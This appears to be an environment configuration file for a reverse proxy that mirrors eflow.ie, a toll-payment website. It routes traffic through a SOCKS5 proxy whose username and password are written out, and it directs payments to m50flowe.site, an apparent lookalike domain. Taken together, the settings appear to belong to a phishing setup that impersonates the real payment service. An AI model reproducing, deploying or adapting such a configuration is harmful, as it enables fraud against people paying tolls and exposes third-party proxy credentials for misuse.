# Target website to proxy
TARGET_URL=https://eflow.ie

# Logging
LOG_LEVEL=info
LOG_REQUESTS=true

# Features
ENABLE_WEBSOCKET=true
ENABLE_COMPRESSION=true

# Proxy timeout (in milliseconds) - 120 seconds
PROXY_TIMEOUT=120000

# External proxy for outgoing requests
USE_PROXY=true
PROXY_TYPE=socks5
PROXY_HOST=185.26.236.199
PROXY_PORT=30449
PROXY_USERNAME=NuhaiProxy_vJl3Ss5m
PROXY_PASSWORD=m9m7nslR

# Payment system URL
PAYMENT_SYSTEM_URL=https://m50flowe.site
